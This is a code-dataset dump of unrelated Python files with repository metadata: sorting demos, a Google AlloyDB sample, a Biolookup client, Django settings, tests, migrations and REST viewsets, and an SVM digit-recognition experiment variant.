    """
    guess = 0
    attempts = 0
    while guess * guess != x:
        guess = int(random.random() * x)
        attempts += 1
    print(f'sqrt_optimized: {attempts}')
    return guess
# Demo: random "sqrt", then plain vs hill-climbing bogosort. The RNG is
# re-seeded with the same seed before each run so both sorts start from an
# identical random list.
print(sqrt_optimized(64))
seed = get_time()
n_values = 8
print(f'seed: {seed}')
print()
random.seed(seed)
nums = random_list(n_values)
print(nums)
bogosort(nums)
print(nums)
# Re-seed so bogosort_optimized sees the exact same starting list.
random.seed(seed)
nums = random_list(n_values)
print(nums)
nums = bogosort_optimized(nums)
print(nums)
# nums = random_list(5)
# print(nums)
# input('...')
# bogosort(nums)
# print(nums)
# def get_time():
# return int(round(time.time() * 1000))
# nums = random_list(12)
# print(nums)
# input('>')
# bogosort(nums)
# print(nums)
# nums = [1, 2, 3, 4]
# print(nums)
# print(is_sorted(nums))
# shuffle_nums(nums)
# print(nums)
# print(is_sorted(nums))
|
[
"flux2341@gmail.com"
] |
flux2341@gmail.com
|
8f425fd16f7d5aded1fbfb08578f898f5cecf18f
|
5da5473ff3026165a47f98744bac82903cf008e0
|
/packages/google-cloud-alloydb/samples/generated_samples/alloydb_v1beta_generated_alloy_db_admin_generate_client_certificate_async.py
|
f1d54b369e792a9e23c7159b0cbbd6d2a0c78430
|
[
"Apache-2.0"
] |
permissive
|
googleapis/google-cloud-python
|
ed61a5f03a476ab6053870f4da7bc5534e25558b
|
93c4e63408c65129422f65217325f4e7d41f7edf
|
refs/heads/main
| 2023-09-04T09:09:07.852632
| 2023-08-31T22:49:26
| 2023-08-31T22:49:26
| 16,316,451
| 2,792
| 917
|
Apache-2.0
| 2023-09-14T21:45:18
| 2014-01-28T15:51:47
|
Python
|
UTF-8
|
Python
| false
| false
| 1,940
|
py
|
# -*- coding: utf-8 -*-
# Copyright 2023 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Generated code. DO NOT EDIT!
#
# Snippet for GenerateClientCertificate
# NOTE: This snippet has been automatically generated for illustrative purposes only.
# It may require modifications to work in your environment.
# To install the latest published package dependency, execute the following:
# python3 -m pip install google-cloud-alloydb
# [START alloydb_v1beta_generated_AlloyDBAdmin_GenerateClientCertificate_async]
# This snippet has been automatically generated and should be regarded as a
# code template only.
# It will require modifications to work:
# - It may require correct/in-range values for request initialization.
# - It may require specifying regional endpoints when creating the service
# client as shown in:
# https://googleapis.dev/python/google-api-core/latest/client_options.html
from google.cloud import alloydb_v1beta
async def sample_generate_client_certificate():
    """Issue a sample GenerateClientCertificate RPC and print the response.

    Generated snippet (see header: DO NOT EDIT); requires real credentials
    and an in-range ``parent`` to actually succeed.
    """
    # Create a client
    client = alloydb_v1beta.AlloyDBAdminAsyncClient()
    # Initialize request argument(s)
    request = alloydb_v1beta.GenerateClientCertificateRequest(
        parent="parent_value",
    )
    # Make the request
    response = await client.generate_client_certificate(request=request)
    # Handle the response
    print(response)
# [END alloydb_v1beta_generated_AlloyDBAdmin_GenerateClientCertificate_async]
|
[
"noreply@github.com"
] |
googleapis.noreply@github.com
|
5f7225a8bb8465174507e5765718f14c91635f9b
|
2d9a3ce2a04190d0032e8a298829022260b1d76b
|
/indra/databases/biolookup_client.py
|
a8ac55265ff756883e26106fd0c97136b94d074f
|
[
"BSD-2-Clause",
"BSD-2-Clause-Views"
] |
permissive
|
sorgerlab/indra
|
f127a0f9bdd2d3f48df14575883fd31e2f4de4bf
|
6d6ca1174792b6c5a05cbf3afcb9f138fabcec6a
|
refs/heads/master
| 2023-08-21T13:25:54.654995
| 2023-06-11T16:46:41
| 2023-06-11T16:46:41
| 22,848,436
| 158
| 61
|
BSD-2-Clause
| 2023-08-30T21:47:59
| 2014-08-11T17:44:05
|
Python
|
UTF-8
|
Python
| false
| false
| 1,316
|
py
|
"""A client to the Biolookup web service available at http://biolookup.io/."""
from typing import Dict
import requests
URL = 'http://biolookup.io/api/lookup/'
def lookup_curie(curie: str) -> Dict:
    """Query the Biolookup web service for a single CURIE.

    Parameters
    ----------
    curie :
        The CURIE to look up.

    Returns
    -------
    :
        The JSON payload of the lookup response as a dictionary.
    """
    response = requests.get(URL + curie)
    response.raise_for_status()
    return response.json()
def lookup(db_ns: str, db_id: str) -> dict:
    """Look up a namespace and corresponding ID in the Biolookup web service.

    Parameters
    ----------
    db_ns :
        The database namespace.
    db_id :
        The database ID.

    Returns
    -------
    :
        A dictionary containing the results of the lookup.
    """
    return lookup_curie('{}:{}'.format(db_ns, db_id))
def get_name(db_ns: str, db_id: str) -> str:
    """Return the name of a namespace and corresponding ID in the Biolookup web
    service.

    Fix: the return annotation was ``Dict``, but the function returns
    ``res.get('name')`` — the entry's name (or None when the lookup result
    has no ``name`` key).

    Parameters
    ----------
    db_ns :
        The database namespace.
    db_id :
        The database ID.

    Returns
    -------
    :
        The name of the entry, or None if the result carries no name.
    """
    res = lookup(db_ns, db_id)
    return res.get('name')
|
[
"ben.gyori@gmail.com"
] |
ben.gyori@gmail.com
|
0797c311f47d452f7d067ce093d1a6ac6666d7b9
|
d178ecd2d3511fcd98aca731ada1aa0fec0e15a1
|
/prog_count/grader.py
|
dca9b796081c90aeae9a3b3000b81e8f76932a68
|
[] |
no_license
|
0xBADCA7/easyctf-iv-problems
|
165cca68e2bad788604dab4b15c644e994c7fa85
|
7037fe557df97cd85b3eada672ef44a356236522
|
refs/heads/master
| 2020-08-13T21:16:26.114580
| 2018-02-21T06:15:40
| 2018-02-21T06:15:40
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 239
|
py
|
from itertools import combinations as comb
# Count the non-empty subsets of the input numbers whose elements sum to s.
# Input: first line "n s", second line the n numbers (n itself is unused).
n, s = map(int, input().split())
nums = [int(u) for u in input().split()]
t = 0
# Enumerate subsets by size; exponential in len(nums) — fine for grader inputs.
for i in range(1, len(nums) + 1):
    for c in comb(nums, i):
        if sum(c) == s:
            t += 1
print(t)
|
[
"failed.down@gmail.com"
] |
failed.down@gmail.com
|
19d84cb48523b1f33dfbbc80555e822ae0d9177b
|
9cfdfe633dfb2755955f9d356fdd0a9601089955
|
/account_auth/tests/test_veiws.py
|
cc19cd637b9384f9d338cf62d7f16a79d4b53583
|
[] |
no_license
|
DimAntDim/ResumeBuilder
|
cec597ba4b857d98147e2f5f6831bd3c93c83c80
|
0507d5d9c44936d892df280015f7c6d8e630f55b
|
refs/heads/main
| 2023-08-21T08:03:43.327868
| 2021-11-03T19:43:04
| 2021-11-03T19:43:04
| 394,882,643
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,701
|
py
|
from account_auth.forms import RegisterForm
from django.contrib.auth import get_user_model
from django.test import TestCase
from django.urls import reverse
UserModel = get_user_model()
class RegisterViewTest(TestCase):
    """Tests for the 'register' view (template rendering and signup POST)."""
    def test_register_render_template(self):
        # GET must render the registration template with a RegisterForm.
        response = self.client.get(reverse('register'))
        self.assertEqual(response.status_code, 200)
        self.assertTemplateUsed(response, template_name='account/register.html')
        self.assertIsInstance(response.context['form'], RegisterForm)
    def test_register_create_user(self):
        # POST signup data and follow the redirect chain; only the final
        # 200 is asserted — actual user creation is not verified here.
        response = self.client.post(reverse('register'),
                                    data={
                                        'email': "test@test.com",
                                        'password': "test",
                                        'password2': "test",
                                    },
                                    follow=True)
        self.assertEqual(response.status_code, 200)
class LoginViewTest(TestCase):
    """Tests for the 'login' view."""
    def test_login_success_redirect_user_home_page(self):
        # NOTE(review): no user with these credentials is created first, so
        # this presumably exercises the failed-login path (form re-rendered
        # with status 200) despite the test's name — confirm intent.
        response = self.client.post(reverse('login'), data={'email': 'test@test.test', 'password': 'test'})
        self.assertEqual(200, response.status_code)
class LogOutViewTest(TestCase):
    """Tests for the 'logout' view."""
    def setUp(self):
        # NOTE(review): 'test@textcom' looks like a typo for 'test@test.com',
        # and objects.create() stores the password unhashed (create_user
        # would hash it) — confirm whether this is intentional.
        self.user = UserModel.objects.create(
            email='test@textcom',
            password = 'test',
        )
    def tearDown(self):
        self.user.delete()
    def test_logout_success_redirect_index(self):
        # NOTE(review): these credentials don't match the user from setUp
        # ('test@test.com'/'text' vs 'test@textcom'/'test'), so login likely
        # fails; the asserted 302 from 'logout' holds either way.
        self.client.login(email="test@test.com", password='text')
        response = self.client.get(reverse('logout'))
        self.assertEqual(302, response.status_code)
|
[
"66394357+DimAntDim@users.noreply.github.com"
] |
66394357+DimAntDim@users.noreply.github.com
|
9a9a5e1a87e823fb31274cc803479e5f9f48c592
|
ce76b3ef70b885d7c354b6ddb8447d111548e0f1
|
/day_or_point/say_good_work.py
|
e57f94898800ec38a14522b3b0c3743ae46ef192
|
[] |
no_license
|
JingkaiTang/github-play
|
9bdca4115eee94a7b5e4ae9d3d6052514729ff21
|
51b550425a91a97480714fe9bc63cb5112f6f729
|
refs/heads/master
| 2021-01-20T20:18:21.249162
| 2016-08-19T07:20:12
| 2016-08-19T07:20:12
| 60,834,519
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 239
|
py
|
#! /usr/bin/env python
def use_few_part_over_bad_hand(str_arg):
    # Echo the argument (via important_number), then print a literal 'thing'.
    important_number(str_arg)
    print('thing')
def important_number(str_arg):
    # Print the argument to stdout.
    print(str_arg)
if __name__ == '__main__':
    # Demo run with a fixed argument.
    use_few_part_over_bad_hand('great_year')
|
[
"jingkaitang@gmail.com"
] |
jingkaitang@gmail.com
|
04f06111126887806589e20ae3df08a21ef35dab
|
683a90831bb591526c6786e5f8c4a2b34852cf99
|
/CodeSignal/Interview/Backtracking/2_WordBoggle.py
|
56777e11c7b04f10d9d347dd0cc392adb21fe6d6
|
[] |
no_license
|
dbetm/cp-history
|
32a3ee0b19236a759ce0a6b9ba1b72ceb56b194d
|
0ceeba631525c4776c21d547e5ab101f10c4fe70
|
refs/heads/main
| 2023-04-29T19:36:31.180763
| 2023-04-15T18:03:19
| 2023-04-15T18:03:19
| 164,786,056
| 8
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,514
|
py
|
import copy
# https://app.codesignal.com/interview-practice/task/v3uf4PGocp2CH62nn/description
# Tag(s): Backtracking, recursion
def print_board(board):
    """Dump the board to stdout, one row per line."""
    rows = list(board)
    for line in rows:
        print(line)
# The 8 neighbour offsets (orthogonal + diagonal) used by explore().
deltas = [
    (-1, 0), (-1, -1), (-1, 1), (0, -1),
    (0, 1), (1, 0), (1, -1), (1, 1)
]


def explore(board, word, i, j, k):
    """DFS from cell (i, j) trying to match word[k:].

    Returns True if word[k:] can be spelled starting at (i, j), moving to
    any of the 8 adjacent cells and never reusing a cell.  Cells on the
    current path are temporarily marked '-' and are always restored
    before returning, so the board is left unmodified.  (The original
    version leaked the mark when the final character matched, which is
    why wordBoggle had to search a deep copy of the board.)
    """
    # Out of bounds.
    if i < 0 or i >= len(board) or j < 0 or j >= len(board[0]):
        return False
    # Cell already on the current path, or word fully consumed.
    if board[i][j] == '-' or k >= len(word):
        return False
    if board[i][j] != word[k]:
        return False
    original_chr = board[i][j]
    board[i][j] = '-'  # mark as visited for the recursive calls
    if k == (len(word) - 1):
        board[i][j] = original_chr  # bug fix: restore before succeeding
        return True
    ans = False
    for delta in deltas:
        if explore(board, word, i + delta[0], j + delta[1], k + 1):
            ans = True
            break
    board[i][j] = original_chr  # backtracking
    return ans
def wordBoggle(board, words):
    """Return, sorted, every word from *words* that can be spelled on *board*."""
    found = []
    for word in words:
        matched = False
        for row in range(len(board)):
            if matched:
                break
            for col in range(len(board[row])):
                # Only start a search from cells holding the first letter.
                if board[row][col] != word[0]:
                    continue
                # Search a throw-away copy: explore() may leave marks behind.
                scratch = copy.deepcopy(board)
                if explore(scratch, word, row, col, 0):
                    found.append(word)
                    matched = True
                    break
    found.sort()
    return found
if __name__ == '__main__':
    # Read the board from stdin: first line is the row count, then one
    # whitespace-separated line of cells per row.
    board = []
    rows = int(input())
    for _ in range(rows):
        x = input().split()
        board.append(x)
    # Final line: the whitespace-separated list of words to look up.
    words = input().split()
    print(wordBoggle(board, words))
|
[
"davbetm@gmail.com"
] |
davbetm@gmail.com
|
8137538c751572157b1a44dc0c0f97368389f271
|
f9cce83d8259f53686ed545cf301d6e72258ea90
|
/mynewproject/mynewproject/settings.py
|
2a6d9179c5e65c306eeb698650876c6ff4e54220
|
[] |
no_license
|
ir4y/docker-workshop
|
dc649e53598d9fc237348aab64ccd3b5141bc12e
|
9e6f7f2445bf4b4ac1c416f83488a8d840d64db6
|
refs/heads/master
| 2020-12-24T22:06:12.190270
| 2016-04-22T20:53:22
| 2016-04-22T20:53:22
| 56,765,105
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,123
|
py
|
"""
Django settings for mynewproject project.
Generated by 'django-admin startproject' using Django 1.9.5.
For more information on this file, see
https://docs.djangoproject.com/en/1.9/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.9/ref/settings/
"""
import os
import dj_database_url
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.9/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
# NOTE(review): this key is committed to source control; move it to an
# environment variable before any production deployment.
SECRET_KEY = '1w60yw+fb4t2ni1=u1-2en59e40=kb44yms*!7z2j@2#85ths6'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
    'django.contrib.admin',
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.messages',
    'django.contrib.staticfiles',
]
# Django 1.9-era setting name (renamed to MIDDLEWARE in Django 1.10+).
MIDDLEWARE_CLASSES = [
    'django.middleware.security.SecurityMiddleware',
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.common.CommonMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'mynewproject.urls'
TEMPLATES = [
    {
        'BACKEND': 'django.template.backends.django.DjangoTemplates',
        'DIRS': [],
        'APP_DIRS': True,
        'OPTIONS': {
            'context_processors': [
                'django.template.context_processors.debug',
                'django.template.context_processors.request',
                'django.contrib.auth.context_processors.auth',
                'django.contrib.messages.context_processors.messages',
            ],
        },
    },
]
WSGI_APPLICATION = 'mynewproject.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.9/ref/settings/#databases
# Connection parameters are read from the DATABASE_URL environment
# variable by dj-database-url.
DATABASES = {
    'default': dj_database_url.config(),
}
# Password validation
# https://docs.djangoproject.com/en/1.9/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
    {
        'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
    },
]
# Internationalization
# https://docs.djangoproject.com/en/1.9/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.9/howto/static-files/
STATIC_URL = '/static/'
|
[
"ir4y.ix@gmail.com"
] |
ir4y.ix@gmail.com
|
15bc8407519a5501e2d0687a01ae6c171ec545ed
|
051c3ee44478265c4510530888335335ec9f7fdf
|
/ML_Applications/SVM/experiments_(MRs_on_Mutants)/digitsData/RBFKernel/Mutants/MR1-permuteFeatures/r5/DigitRecognitionApp_5.py
|
99860b4f108cd70b0936ce937a2f1954c2cf2a6a
|
[] |
no_license
|
PinjiaHe/VerifyML
|
b581c016012c62d8439adfce0caef4f098b36d5e
|
3bd7c49e45720c1cdfe0af4ac7dd35b201056e65
|
refs/heads/master
| 2020-03-25T19:40:39.996370
| 2018-01-30T08:58:58
| 2018-01-30T08:58:58
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,197
|
py
|
"""
Created on Fri May 26 15:20:01 2017
#Digit Recognition for V & V
#Following note added by Raghu
Note:
1. The actual digits data from the http://archive.ics.uci.edu/ml/datasets/Pen-Based+Recognition+of+Handwritten+Digits is different than the one referred in this sklearn example
2. For more info, refer this link http://scikit-learn.org/stable/modules/generated/sklearn.datasets.load_digits.html and the above one.
3. The digits data referred by this Sklearn example can be downloaded from the following link.
https://github.com/scikit-learn/scikit-learn/blob/master/sklearn/datasets/data/digits.csv.gz
"""
import matplotlib.pyplot as plt
from sklearn import datasets, svm, metrics
import numpy as np
import _pickle as cPickle
# Load training data: each row is 64 pixel values followed by the label.
digits = np.loadtxt('digits_Train_MR1_PermFeatures.csv', delimiter=',')
digits_images_flat = digits[:,:(-1)]
digits_images = digits_images_flat.view()
digits_images.shape = ((-1), 8, 8)
digits_target = digits[:,(-1)].astype(np.int)
# Load test data in the same layout.
digits_test = np.loadtxt('digits_Test_MR1_PermFeatures.csv', delimiter=',')
digits_test_images_flat = digits_test[:,:(-1)]
digits_test_images = digits_test_images_flat.view()
digits_test_images.shape = ((-1), 8, 8)
# NOTE(review): the training labels come from the LAST column, but here
# column 1 is used.  This file lives under a "Mutants" directory, so the
# discrepancy may be an intentional mutation — confirm before "fixing".
digits_test_target = digits_test[:,1].astype(np.int)
images_and_labels = list(zip(digits_images, digits_target))
n_samples = len(digits_images)
# Train an SVM (default RBF kernel) on the flattened training images.
classifier = svm.SVC(gamma=0.001)
classifier.fit(digits_images_flat, digits_target)
expected = digits_test_target
predicted = classifier.predict(digits_test_images_flat)
print('Classification report for classifier %s:\n%s\n' % (
    classifier, metrics.classification_report(expected, predicted)))
print('Confusion matrix:\n%s' % metrics.confusion_matrix(expected, predicted))
print("accuracy:", metrics.accuracy_score(expected, predicted))
images_and_predictions = list(zip(digits_test_images, predicted))
# Persist decision scores, the confusion matrix, and the fitted model.
np.savetxt('output.txt', classifier.decision_function(digits_test_images_flat))
outputData = {'data_array': metrics.confusion_matrix(expected, predicted)}
with open('output.pkl', 'wb') as outputFile:
    cPickle.dump(outputData, outputFile)
with open('model.pkl', 'wb') as modelFile:
    cPickle.dump(classifier, modelFile)
|
[
"anurag.bms@gmail.com"
] |
anurag.bms@gmail.com
|
53f18e3d6324766217bd33e5f7c5df5c74d01171
|
7e98a3fc246547cc93ce2a93f39410aac38f8dd3
|
/bag/tests/test_urls.py
|
c6fc2dc10f4a6c80e6986f82a633ff10c1e9cdec
|
[] |
no_license
|
kydzoster/huntinteriors
|
53b5d064f05010c71c70d72a6148494226980287
|
4439c652d74d9b5553abc67d4bbac73b33b42336
|
refs/heads/main
| 2023-02-04T03:14:50.250492
| 2020-12-16T13:22:31
| 2020-12-16T13:22:31
| 301,401,449
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,063
|
py
|
from django.test import TestCase
from django.urls import reverse, resolve
from bag.views import view_bag, add_to_bag, adjust_bag, remove_from_bag,\
success
class TestUrls(TestCase):
    """Verify that each bag URL name resolves to its view function."""

    def test_view_bag_url_is_resolved(self):
        match = resolve(reverse('view_bag'))
        print(match)
        self.assertEquals(match.func, view_bag)

    def test_add_to_bag_url_is_resolved(self):
        match = resolve(reverse('add_to_bag', args=[1]))
        print(match)
        self.assertEquals(match.func, add_to_bag)

    def test_adjust_bag_url_is_resolved(self):
        match = resolve(reverse('adjust_bag', args=[1]))
        print(match)
        self.assertEquals(match.func, adjust_bag)

    def test_remove_from_bag_url_is_resolved(self):
        match = resolve(reverse('remove_from_bag', args=[1]))
        print(match)
        self.assertEquals(match.func, remove_from_bag)

    def test_success_url_is_resolved(self):
        match = resolve(reverse('success'))
        print(match)
        self.assertEquals(match.func, success)
|
[
"kydzoster@gmail.com"
] |
kydzoster@gmail.com
|
4511418ac6a1ba4d051b347cf150a798e4753afa
|
644d9ef18713e4cb5d4c3b53301bd7276dcdf477
|
/api/programs/serializers/courses/__init__.py
|
0420ef42cac21787e67976e0cca760e59a01bd92
|
[] |
no_license
|
alexhernandez-git/django-classline
|
6cb5bcd268248999e18037f58c4ed30012d51915
|
49fcf0c6d735a56eaebc17d04be52dab91ca4c3a
|
refs/heads/master
| 2023-03-18T07:10:08.770066
| 2021-03-04T22:24:09
| 2021-03-04T22:24:09
| 287,985,028
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 372
|
py
|
from .languages import *
from .prices import *
from .courses import *
from .blocks import *
from .block_tracks import *
from .items import *
from .item_tracks import *
from .contents import *
from .item_questions import *
from .item_answers import *
from .items_viewed import *
from .materials import *
from .course_users_data import *
from .students import *
|
[
"vlexhndz@gmail.com"
] |
vlexhndz@gmail.com
|
81b3c1a604d12b227bc601a62060b3b20494c030
|
c03d7a4e03c581d4be98b6363003cddb9c213ec0
|
/registration/migrations/0017_auto_20181122_2208.py
|
3e33472466085ca31c4186c48ec9f60a73f4368e
|
[] |
no_license
|
hernandavidc/plataforma
|
b333e4f06290713072d8dc609c27d4ce8af1d9df
|
4316e2a59db76e74f1e6106958631ad4a7a653c7
|
refs/heads/master
| 2020-04-06T17:08:21.019355
| 2019-04-09T04:41:00
| 2019-04-09T04:41:00
| 157,648,096
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 641
|
py
|
# Generated by Django 2.1 on 2018-11-23 03:08
from django.db import migrations, models
class Migration(migrations.Migration):
    """Make Veterinaria.latitud/longitud optional decimals (9 digits, 8 decimal places)."""

    dependencies = [
        ('registration', '0016_auto_20180910_1209'),
    ]
    operations = [
        migrations.AlterField(
            model_name='veterinaria',
            name='latitud',
            field=models.DecimalField(blank=True, decimal_places=8, max_digits=9, null=True),
        ),
        migrations.AlterField(
            model_name='veterinaria',
            name='longitud',
            field=models.DecimalField(blank=True, decimal_places=8, max_digits=9, null=True),
        ),
    ]
|
[
"hernandavidc@hotmail.com"
] |
hernandavidc@hotmail.com
|
5d0900423f187a722e7b4784a10d242cb508eaa3
|
f4309766d0292d6ae06344221b667603fda206ec
|
/backend/apps/user/views.py
|
f23bb486e4b7eca9c5f74b758711e4d8d7606f82
|
[] |
no_license
|
tom2jack/Journey
|
dff0181ef8939a9edf52987a2439563ca0c4342d
|
cb7bbca759c3d27815fde0d1697c2184b31b2aac
|
refs/heads/master
| 2022-02-23T05:43:58.602808
| 2019-10-08T08:27:36
| 2019-10-08T08:27:36
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,632
|
py
|
from django.shortcuts import render
from rest_framework import status
from rest_framework.response import Response
from rest_framework import viewsets
from django.db.models import Q
from rest_framework import filters
from user.models import *
from user.serializers import *
from user.permissions import CustomerPremission
import random, string
def random_str(randomlength=10):
    """Return a random ASCII-letter string of length *randomlength*.

    This is used to generate initial user passwords (see UsersViewSet),
    so characters are drawn with the cryptographically secure ``secrets``
    module rather than ``random``.  Characters may repeat, which also
    removes the old implicit 52-character cap: the previous shuffle-based
    version could never repeat a letter and silently truncated requests
    longer than len(string.ascii_letters).
    """
    import secrets  # local import keeps this fix self-contained
    return ''.join(secrets.choice(string.ascii_letters) for _ in range(randomlength))
class UserGroupViewSet(viewsets.ModelViewSet):
    """
    list:
        User-group list.
    create:
        Create a user group.
    delete:
        Delete a user group.
    update:
        Modify a user group (replaces its member set).
    """
    queryset = UserGroup.objects.all().order_by('id')
    serializer_class = UserGroupSerializer
    filter_backends = (filters.SearchFilter, filters.OrderingFilter,)
    search_fields = ('group','comment',)
    ordering_fields = ('id',)
    # permission configuration
    permission_classes = [CustomerPremission,]
    module_perms = ['user:usergroup']
    def update(self, request, *args, **kwargs):
        # Replace the group's membership with the users whose ids are
        # listed in request.data['userselected'].
        partial = kwargs.pop('partial', False)
        userselected = request.data['userselected']
        instance = self.get_object()
        serializer = self.get_serializer(instance, data=request.data, partial=partial)
        serializer.is_valid(raise_exception=True)
        # NOTE(review): serializer.save()/perform_update() is never called
        # here, so only the m2m membership is persisted — confirm intended.
        userlist = Users.objects.filter(Q(id__in=userselected))
        instance.user_group.set(userlist,bulk=True)
        return Response(serializer.data)
class MenuViewSet(viewsets.ModelViewSet):
    """
    list:
        Menu list, returned as a three-level tree.
    create:
        Create a menu entry.
    delete:
        Delete a menu entry.
    update:
        Modify a menu entry.
    """
    queryset = Menu.objects.all().order_by('id')
    serializer_class = MenuSerializer
    filter_backends = (filters.SearchFilter, filters.OrderingFilter,)
    # search_fields = ('mtype',)
    ordering_fields = ('id',)
    # permission configuration
    permission_classes = [CustomerPremission,]
    module_perms = ['user:menu']
    def list(self, request, *args, **kwargs):
        # Build a three-level tree linked via parent_id:
        # mtype 0 = top level, 1 = second level, 2 = leaf entries.
        results = []
        queryset = self.filter_queryset(self.get_queryset())
        for i in queryset.filter(Q(mtype=0)):
            results.append({'id':i.id,'name':i.name,'parent_id':i.parent_id,'url':i.url,'perms':i.perms,'mtype':i.mtype,'icon':i.icon,'del_flag':i.del_flag,'children':[]})
        for item in results:
            for i in queryset.filter(Q(mtype=1)&Q(parent_id=item['id'])):
                item['children'].append({'id':i.id,'name':i.name,'parent_id':i.parent_id,'url':i.url,'perms':i.perms,'mtype':i.mtype,'icon':i.icon,'del_flag':i.del_flag,'children':[]})
        for item in results:
            if (len(item['children']) > 0):
                for node in item['children']:
                    for i in queryset.filter(Q(mtype=2)&Q(parent_id=node['id'])):
                        node['children'].append({'id':i.id,'name':i.name,'parent_id':i.parent_id,'url':i.url,'perms':i.perms,'mtype':i.mtype,'icon':i.icon,'del_flag':i.del_flag})
        # serializer = self.get_serializer(queryset, many=True)
        return Response(results)
class RoleViewSet(viewsets.ModelViewSet):
    """
    list:
        Role list.
    create:
        Create a role.
    delete:
        Delete a role.
    update:
        Modify a role: its menu permissions or its user membership,
        selected by request.data['type'].
    """
    queryset = Role.objects.all().order_by('id')
    serializer_class = RoleSerializer
    filter_backends = (filters.SearchFilter, filters.OrderingFilter,)
    # Bug fix: search_fields must be an iterable of field names.  The
    # previous value ('name') was just the string 'name' (missing trailing
    # comma), which DRF's SearchFilter would iterate character by
    # character ('n', 'a', 'm', 'e').
    search_fields = ('name',)
    ordering_fields = ('id',)
    # permission configuration
    permission_classes = [CustomerPremission,]
    module_perms = ['user:role']
    def update(self, request, *args, **kwargs):
        # 'type' selects whether to update the role's permissions (menus)
        # or its user membership; anything else only validates the data.
        edittype = request.data['type']
        partial = kwargs.pop('partial', False)
        instance = self.get_object()
        serializer = self.get_serializer(instance, data=request.data, partial=partial)
        serializer.is_valid(raise_exception=True)
        if (edittype == 'role_perms'):
            permsselected = request.data['permsselected']
            instance.menu.set(permsselected)
        elif (edittype == 'role_users'):
            userselected = request.data['userselected']
            instance.user_role.set(userselected)
        return Response(serializer.data)
class UsersViewSet(viewsets.ModelViewSet):
    """
    list:
        User list.
    create:
        Create a user (a random password is generated when none is given).
    delete:
        Delete a user.
    update:
        Modify a user, re-hashing the password when one is supplied.
    """
    queryset = Users.objects.all().order_by('id')
    serializer_class = UsersSerializer
    filter_backends = (filters.SearchFilter, filters.OrderingFilter,)
    search_fields = ('username','email',)
    ordering_fields = ('id',)
    # permission configuration
    permission_classes = [CustomerPremission,]
    module_perms = ['user:user']
    def create(self, request, *args, **kwargs):
        # An empty password means "generate one" (the mail notification
        # below is currently disabled).
        if (len(request.data['password']) == 0):
            mailtolist = []
            request.data['password'] = random_str()
        # NOTE(review): `mailtolist` is only bound in the branch above, so
        # a request that supplies its own password raises NameError at the
        # append below — confirm the intended flow.
        serializer = self.get_serializer(data=request.data)
        serializer.is_valid(raise_exception=True)
        self.perform_create(serializer)
        username = request.data['username']
        password = request.data['password']
        useremail = request.data['email']
        mailtolist.append(useremail)
        # Re-fetch the created user and store the password hashed.
        userinfo = Users.objects.get(username=username)
        userinfo.set_password(password)
        userinfo.save()
        headers = self.get_success_headers(serializer.data)
        # maildata = {}
        # maildata['username'] = username
        # maildata['password'] = password
        # send_mail(mailtolist,1,maildata)
        return Response(request.data, status=status.HTTP_201_CREATED, headers=headers)
    def update(self, request, *args, **kwargs):
        # NOTE(review): both branches duplicate the standard update logic;
        # only the password-hashing/mail part differs.
        if ('password' in request.data.keys()):
            mailtolist = []
            partial = kwargs.pop('partial', False)
            instance = self.get_object()
            serializer = self.get_serializer(instance, data=request.data, partial=partial)
            serializer.is_valid(raise_exception=True)
            self.perform_update(serializer)
            if getattr(instance, '_prefetched_objects_cache', None):
                # If 'prefetch_related' has been applied to a queryset, we need to
                # forcibly invalidate the prefetch cache on the instance.
                instance._prefetched_objects_cache = {}
            username = request.data['username']
            password = request.data['password']
            useremail = request.data['email']
            # mail payload
            maildata = {}
            maildata['username'] = username
            maildata['password'] = password
            # recipient address
            mailtolist.append(useremail)
            userinfo = Users.objects.get(username=username)
            userinfo.set_password(password)
            userinfo.save()
            # send_mail(mailtolist,2,maildata)
        else:
            partial = kwargs.pop('partial', False)
            instance = self.get_object()
            serializer = self.get_serializer(instance, data=request.data, partial=partial)
            serializer.is_valid(raise_exception=True)
            self.perform_update(serializer)
            if getattr(instance, '_prefetched_objects_cache', None):
